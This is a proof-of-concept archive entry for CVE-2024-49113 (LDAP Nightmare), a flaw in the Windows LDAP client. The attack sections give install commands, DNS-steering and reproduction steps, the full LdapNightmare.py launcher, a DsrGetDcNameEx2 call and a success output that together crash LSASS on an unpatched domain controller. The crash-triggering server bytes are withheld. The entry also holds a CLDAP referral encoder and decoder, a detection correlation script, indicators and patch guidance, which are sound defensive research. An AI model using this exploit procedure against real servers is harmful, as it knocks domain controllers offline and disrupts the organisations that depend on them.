PoC Archive

LDAP Nightmare — Windows LDAP Client RCE/DoS (CVE-2024-49113)

by SafeBreach Labs (Or Yair, Shahak Morag); CVE reported by Yuki Chen · 2026-05-15

Severity:          Critical
CVE:               CVE-2024-49113
Category:          network
Affected product:  Microsoft Windows LDAP client / Netlogon interaction path
Affected versions: Windows Server systems affected by CVE-2024-49113 (vendor-specific vulnerable builds)
Disclosed:         2026-05-15 (date the entry was added to this archive; Microsoft's fix for CVE-2024-49113 shipped in the December 2024 security updates)
Patch status:      patched

Metadata

Field                  Value
Date Added             2026-05-15
Author / Researcher    SafeBreach Labs (Or Yair, Shahak Morag); CVE reported by Yuki Chen
CVE / Advisory         CVE-2024-49113
Category               network
Severity               Critical
CVSS Score             N/A
Status                 Weaponized
Tags                   LDAP, NRPC, Windows Server, unauthenticated, DoS, potential-RCE

Affected Target

Field                    Value
Software / System        Microsoft Windows LDAP client / Netlogon interaction path
Versions Affected        Windows Server systems affected by CVE-2024-49113 (vendor-specific vulnerable builds)
Language / Platform      Python PoC targeting Windows Server environments
Authentication Required  No
Network Access Required  Yes

Summary

LDAP Nightmare is the public SafeBreach Labs PoC for CVE-2024-49113, a vulnerability in the Windows LDAP client that a remote, unauthenticated attacker can reach through the domain controller locator logic behind the Netlogon DsrGetDcNameEx2 RPC call. The PoC starts a malicious CLDAP (LDAP over UDP/389) listener, calls DsrGetDcNameEx2 on the target with an attacker-controlled domain name so that the target's DC locator resolves and contacts the attacker's host as a candidate domain controller, and answers that CLDAP query with crafted data that reaches the vulnerable handling. In observed PoC behaviour a successful run crashes LSASS on the target (Netlogon runs inside lsass.exe), which forces the domain controller to restart. Microsoft's advisory classifies CVE-2024-49113 itself as a denial-of-service vulnerability; remote code execution in the same Windows LDAP code was assigned a separate CVE fixed in the same update, which is why this entry is tagged potential-RCE.


Vulnerability Details

Root Cause

The vulnerable code is in the Windows LDAP client as used by the domain controller locator during DC discovery. When the client processes attacker-influenced LDAP referral/response data returned by a host it contacted as a candidate DC, unsafe handling of that data drives the process into an invalid state. Because the lookup runs inside LSASS, the observable failure is an LSASS crash; the attacker never needs to authenticate, only to control what the target receives on the LDAP leg of the discovery flow.

Attack Vector

An attacker runs a malicious LDAP (CLDAP, UDP/389) server and invokes DsrGetDcNameEx2 against the target over Netlogon RPC, passing a DomainName whose DNS the attacker controls. The target's DC locator then looks up that domain's LDAP SRV records, is pointed at the attacker's host, and sends it a CLDAP query; the attacker's crafted response to that query is what triggers the vulnerability. No credentials are needed, only network reach to the target's Netlogon RPC endpoint and a DNS path from the target to records the attacker controls.
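The CLDAP leg of this exchange, as an added example: this is editor-written illustration, not the PoC's exploit_server.py, and the bytes that actually trigger CVE-2024-49113 are deliberately not reproduced. It is a minimal BER codec that builds the LDAPMessage/searchResDone-with-referral shape a malicious responder can answer the DC locator's CLDAP query with, plus a decoder that pulls the result code and referral URIs out of a captured UDP/389 payload so a defender can see where a DC was being redirected. The sample response, the 203.0.113.7 address and the corp.example naming are constructed.

```python
from urllib.parse import urlsplit

# Application tags of the LDAPMessage protocolOp CHOICE (RFC 4511).
LDAP_OPS = {0x63: "searchRequest", 0x64: "searchResEntry",
            0x65: "searchResDone", 0x73: "searchResRef"}
TAG_SEQUENCE, TAG_INTEGER, TAG_ENUMERATED, TAG_OCTET_STRING = 0x30, 0x02, 0x0A, 0x04
TAG_SEARCH_RES_DONE = 0x65
TAG_REFERRAL = 0xA3          # [3] context-specific, constructed, inside LDAPResult
RESULT_REFERRAL = 10         # LDAP resultCode 'referral'


def ber_int(n: int) -> bytes:
    """Minimal two's-complement content octets for INTEGER / ENUMERATED."""
    return n.to_bytes(max(1, (n.bit_length() + 8) // 8), "big", signed=True)


def ber_len(n: int) -> bytes:
    """BER length octets: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag: int, payload: bytes) -> bytes:
    return bytes([tag]) + ber_len(len(payload)) + payload


def build_search_result_done(msg_id: int, result_code: int, referrals=()) -> bytes:
    """Encode LDAPMessage { messageID, searchResDone { resultCode, matchedDN,
    diagnosticMessage, [3] referral OPTIONAL } }: the message class a CLDAP
    responder answers the DC locator with."""
    result = tlv(TAG_ENUMERATED, ber_int(result_code))
    result += tlv(TAG_OCTET_STRING, b"")          # matchedDN
    result += tlv(TAG_OCTET_STRING, b"")          # diagnosticMessage
    if referrals:
        uris = b"".join(tlv(TAG_OCTET_STRING, u.encode()) for u in referrals)
        result += tlv(TAG_REFERRAL, uris)
    return tlv(TAG_SEQUENCE,
               tlv(TAG_INTEGER, ber_int(msg_id)) + tlv(TAG_SEARCH_RES_DONE, result))


def read_tlv(buf: bytes, off: int):
    """Return (tag, content, next_offset) for the TLV at buf[off].  LDAP only
    needs single-octet tags; indefinite and oversized lengths are rejected
    rather than trusted, and every length is bounds-checked."""
    if off + 2 > len(buf):
        raise ValueError("truncated TLV header")
    tag, first = buf[off], buf[off + 1]
    off += 2
    if first < 0x80:
        length = first
    else:
        n = first & 0x7F
        if n == 0 or n > 4:
            raise ValueError("indefinite or oversized BER length")
        length = int.from_bytes(buf[off:off + n], "big")
        off += n
    end = off + length
    if end > len(buf):
        raise ValueError("BER length runs past end of buffer")
    return tag, buf[off:end], end


def parse_ldap_message(buf: bytes) -> dict:
    """Decode one LDAPMessage; for searchResDone also extract the LDAPResult
    fields and any referral URIs."""
    tag, body, end = read_tlv(buf, 0)
    if tag != TAG_SEQUENCE or end != len(buf):
        raise ValueError("not a single LDAPMessage SEQUENCE")
    tag, mid, off = read_tlv(body, 0)
    if tag != TAG_INTEGER:
        raise ValueError("messageID missing")
    op_tag, op, _ = read_tlv(body, off)
    msg = {"message_id": int.from_bytes(mid, "big", signed=True),
           "op": LDAP_OPS.get(op_tag, "app-tag-0x%02x" % op_tag)}
    if op_tag != TAG_SEARCH_RES_DONE:
        return msg
    tag, code, off = read_tlv(op, 0)
    if tag != TAG_ENUMERATED:
        raise ValueError("LDAPResult.resultCode missing")
    msg["result_code"] = int.from_bytes(code, "big", signed=True)
    _, dn, off = read_tlv(op, off)
    _, diag, off = read_tlv(op, off)
    msg["matched_dn"] = dn.decode("utf-8", "replace")
    msg["diagnostic"] = diag.decode("utf-8", "replace")
    msg["referrals"] = []
    if off < len(op):
        tag, uris, _ = read_tlv(op, off)
        if tag == TAG_REFERRAL:
            pos = 0
            while pos < len(uris):
                _, uri, pos = read_tlv(uris, pos)
                msg["referrals"].append(uri.decode("utf-8", "replace"))
    return msg


def referral_hosts(msg: dict) -> list:
    """Hosts a searchResDone tries to redirect the client to; on a domain
    controller these should only ever be its own domain's DCs."""
    hosts = [urlsplit(u).hostname for u in msg.get("referrals", [])]
    return [h for h in hosts if h]


# Constructed sample: a CLDAP reply from an attacker host (203.0.113.7 is a
# documentation address) redirecting the caller elsewhere.
SAMPLE_RESPONSE = build_search_result_done(
    1, RESULT_REFERRAL, ["ldap://203.0.113.7/DC=corp,DC=example"])

if __name__ == "__main__":
    decoded = parse_ldap_message(SAMPLE_RESPONSE)
    print(decoded, referral_hosts(decoded))
```

Feed parse_ldap_message the UDP payload of any 389/udp datagram captured from a DC (for example the data portion of a packet exported from a capture tool) and compare referral_hosts against the list of known DCs; any other host in a referral is exactly the redirection this attack relies on.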

Impact

  • Remote, unauthenticated crash of LSASS on a vulnerable Windows Server, which forces the server to restart (denial of service of the domain controller).
  • Service instability on the Netlogon/LSASS processing path while the attack is repeated.
  • Microsoft's advisory classifies CVE-2024-49113 itself as a denial-of-service issue; remote code execution in the same Windows LDAP code was assigned a separate CVE fixed in the same update, so an unpatched DC reachable by this PoC should be treated as exposed to both.

Environment / Lab Setup

OS:          Attacker on Linux/macOS/Windows with Python 3
Target:      Vulnerable Windows Server in authorized lab domain environment
Attacker:    Host reachable by target over required RPC/LDAP paths
Tools:       python3, impacket and the other Python packages the PoC requires (the pip line below installs them)

Setup Steps

cd pocs/network/2026-05-15_ldap-nightmare-cve-2024-49113
python3 -m venv .venv
source .venv/bin/activate
pip install impacket pyasn1 pycryptodome pyOpenSSL responder
python3 LdapNightmare.py <target_ip> --domain-name <attacker-controlled-domain>

Proof of Concept

Step-by-Step Reproduction

  1. Prepare DNS for the attacker-controlled domain name so that the target's DC locator is steered to the attacker host: the locator resolves the domain's LDAP SRV record (_ldap._tcp.dc._msdcs.<domain-name>), so that record and the name it points at must lead to the machine running the PoC, and the target's DNS resolution path must be able to reach those records.
  2. Start the PoC; it launches the malicious UDP/389 (CLDAP) listener before issuing the RPC call.
  3. Trigger DsrGetDcNameEx2 against the vulnerable target's Netlogon RPC endpoint with the attacker-controlled domain as DomainName.
  4. Observe the result: the PoC reports success when the RPC connection is reset, which is what happens when LSASS (the process hosting Netlogon) crashes. A normally completed call means the vulnerable path was not reached, typically because the target is patched or the DNS/CLDAP leg never arrived at the listener.

Exploit Code

See LdapNightmare.py, exploit_server.py, and rpc_call.py in this folder. The call below invokes the PoC's RPC wrapper directly. Note that port must be the TCP port on which the target's Netlogon RPC interface is actually listening: 49664 is only the PoC's default, and the dynamic endpoint can be confirmed through the target's RPC endpoint mapper on TCP 135 before running the exploit.

from rpc_call import DsrGetDcNameEx2

DsrGetDcNameEx2(
    target_ip="192.0.2.10",
    port=49664,
    account="Administrator",
    site_name="",
    domain_name="example.com",
)

Expected Output

INFO: Waiting for udp server to start...
INFO: Calling DsrGetDcNameEx2 now...
INFO: Successfully triggered the vulnerability!

Screenshots / Evidence

  • screenshots/ — add authorized lab captures of RPC call, malicious LDAP interaction, and target failure signal.

Detection & Indicators of Compromise

- Unexpected outbound DNS SRV lookups (_ldap._tcp.dc._msdcs.<domain>) from a domain controller for domains that are neither its own nor trusted, followed by UDP/389 (CLDAP) traffic from lsass.exe to a host that is not a known domain controller
- Netlogon RPC calls to DsrGetDcNameEx2 carrying a DomainName the DC has no relationship with; default Windows auditing does not record individual Netlogon RPC calls, so this indicator needs network capture of DCE/RPC to the DC's Netlogon endpoint or an RPC-level monitoring tool
- LSASS crashes (Application Error, event ID 1000 for lsass.exe, followed by an unplanned restart) correlated in time with the above

SIEM / IDS Rule (example):

Alert when a domain controller performs an LDAP SRV lookup for a domain outside the approved list and then sends LDAP/CLDAP traffic to a host that is not an approved domain controller within a short window of inbound NRPC DsrGetDcNameEx2 activity; escalate when an LSASS crash follows in the same window.
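The rule above as a correlation over constructed DC-side telemetry, added here as an example and not part of the PoC or this archive. The log format, the assumption that an RPC-level monitor records DsrGetDcNameEx2 calls (Windows auditing does not log them on its own), the host names and the addresses are all constructed for the illustration.

```python
import shlex
from datetime import datetime, timedelta

# Constructed DC-side telemetry, not real logs.  One record per line:
# <timestamp> <host> <kind> key=value ...
# `rpc` lines assume an RPC-level monitor in front of Netlogon; `dns` and
# `net` are resolver/connection telemetry from the DC; `evt` is a Windows
# Application log record.  198.51.100.23 / 203.0.113.7 are documentation
# addresses standing in for the attacker; 10.0.0.5 is the "known DC".
SAMPLE_LOG = """\
2025-01-01T10:00:00 dc01 rpc src=198.51.100.23 iface=netlogon op=DsrGetDcNameEx2 domain=corp.example
2025-01-01T10:00:00 dc01 dns qname=_ldap._tcp.dc._msdcs.corp.example qtype=SRV
2025-01-01T10:00:01 dc01 net proto=udp dst=10.0.0.5 dport=389 process=lsass.exe
2025-01-01T10:05:00 dc01 rpc src=198.51.100.23 iface=netlogon op=DsrGetDcNameEx2 domain=attacker.example
2025-01-01T10:05:00 dc01 dns qname=_ldap._tcp.dc._msdcs.attacker.example qtype=SRV
2025-01-01T10:05:01 dc01 net proto=udp dst=203.0.113.7 dport=389 process=lsass.exe
2025-01-01T10:05:02 dc01 evt source="Application Error" id=1000 process=lsass.exe
"""


def parse_line(line: str) -> dict:
    """Split one record into a dict; shlex keeps quoted values intact."""
    ts, host, kind, *fields = shlex.split(line)
    rec = {"ts": datetime.fromisoformat(ts), "host": host, "kind": kind}
    for field in fields:
        key, _, value = field.partition("=")
        rec[key] = value
    return rec


def correlate(log_text: str, trusted_dc_ips: set, window_s: int = 10) -> list:
    """One alert per DsrGetDcNameEx2 call that is followed, on the same host
    and within window_s seconds, by LSASS talking CLDAP (udp/389) to a host
    that is not a known domain controller.  An LSASS crash inside the same
    window raises the alert to 'critical', the PoC's observable outcome."""
    events = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    alerts = []
    for i, ev in enumerate(events):
        if ev["kind"] != "rpc" or ev.get("op") != "DsrGetDcNameEx2":
            continue
        deadline = ev["ts"] + timedelta(seconds=window_s)
        follow = [e for e in events[i + 1:]
                  if e["host"] == ev["host"] and e["ts"] <= deadline]
        domain = ev.get("domain", "").lower()
        # Context only: did the locator actually go looking for that domain?
        srv_lookup = any(e["kind"] == "dns" and e.get("qtype") == "SRV"
                         and e.get("qname", "").lower().endswith("." + domain)
                         for e in follow)
        # The decisive signal: LSASS speaking CLDAP to something that is not a DC.
        cldap_dst = sorted({e["dst"] for e in follow
                            if e["kind"] == "net" and e.get("dport") == "389"
                            and e.get("process") == "lsass.exe"
                            and e.get("dst") and e["dst"] not in trusted_dc_ips})
        if not cldap_dst:
            continue          # locator went to a known DC: normal AD traffic
        crashed = any(e["kind"] == "evt" and e.get("id") == "1000"
                      and e.get("process") == "lsass.exe" for e in follow)
        alerts.append({"host": ev["host"], "rpc_src": ev.get("src"),
                       "domain": domain, "srv_lookup": srv_lookup,
                       "ldap_dst": cldap_dst,
                       "severity": "critical" if crashed else "high"})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_LOG, trusted_dc_ips={"10.0.0.5"}):
        print(alert)
```

The first DsrGetDcNameEx2 call in the sample is ordinary locator traffic (the lookup ends at a known DC) and produces nothing; the second ends at an unknown host and is followed by an lsass.exe crash, so it is reported as critical. The window is deliberately short: the DNS and CLDAP legs follow the RPC call within a second or two, so a long window mostly adds false positives from unrelated locator activity.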

Remediation

Action             Detail
Patch              Apply the Microsoft security updates that address CVE-2024-49113 (first shipped in the December 2024 update cycle) on all affected systems; this is the only real fix.
Workaround         Restrict outbound LDAP/CLDAP and DNS lookup paths from domain controllers to trusted infrastructure only, so an attacker-controlled host cannot be reached on the CLDAP leg even if the RPC call lands.
Config Hardening   Monitor and limit anomalous Netlogon/DC-discovery behaviour; segment DC egress where possible and restrict which networks can reach the DCs' RPC endpoints.

Notes

Auto-ingested from https://github.com/SafeBreach-Labs/CVE-2024-49113 on 2026-05-15.

LdapNightmare.py
# For authorized security research and educational use only.
# Do not use against systems or networks without explicit permission.

import time
import asyncio
import argparse
import threading

from logger import logger                      # PoC-local logging helper
from rpc_call import DsrGetDcNameEx2           # Impacket-based NRPC wrapper
from exploit_server import run_exploit_server  # malicious UDP/389 (CLDAP) responder


def start_ldap_server(listen_port: int):
    """Run the async exploit server in this thread (it owns its own event loop)."""
    asyncio.run(run_exploit_server(listen_port))


def main():
    parser = argparse.ArgumentParser(
        description="Call NRPC DsrGetDcNameEx2 via Impacket"
    )
    parser.add_argument("target_ip", help="Target IP address (required)")
    parser.add_argument(
        "--port", "-p",
        type=int,
        default=49664,
        help="TCP port of the target's Netlogon RPC endpoint (default: 49664)"
    )
    parser.add_argument(
        "--listen-port", "-l",
        type=int,
        default=389,
        help="UDP port for the exploit server to listen on (default: 389)"
    )
    parser.add_argument(
        "--domain-name", "-d",
        required=True,
        help="DomainName parameter (attacker-controlled domain)"
    )
    parser.add_argument(
        "--account", "-a",
        default="Administrator",
        help="AccountName parameter (default: Administrator)"
    )
    parser.add_argument(
        "--site-name", "-s",
        default="",
        help="SiteName parameter (default: empty string)"
    )

    args = parser.parse_args()

    # 1. Start the exploit server in a background thread. It is a daemon thread,
    #    so the process exits once the RPC call below has returned or failed.
    server_thread = threading.Thread(target=start_ldap_server, daemon=True, args=(args.listen_port,))
    server_thread.start()

    # 2. Give the listener a moment to bind before the target is pointed at it.
    logger.info("Waiting for udp server to start...")
    time.sleep(2)

    # 3. Issue the RPC call; the target's DC locator will now look up the
    #    attacker-controlled domain and end up talking CLDAP to our listener.
    logger.info("Calling DsrGetDcNameEx2 now...")
    try:
        DsrGetDcNameEx2(
            target_ip=args.target_ip,
            port=args.port,
            account=args.account,
            site_name=args.site_name,
            domain_name=args.domain_name
        )
        # A normal return means the target answered the call, i.e. the crash did
        # not happen (patched target, or the DNS/CLDAP leg never reached the listener).
        logger.error("Failed to trigger the vulnerability!")
    except ConnectionResetError:
        # Netlogon is implemented inside the lsass.exe process, so the RPC
        # connection is reset when LSASS crashes after the exploit is triggered.
        logger.info("Successfully triggered the vulnerability!")


if __name__ == "__main__":
    main()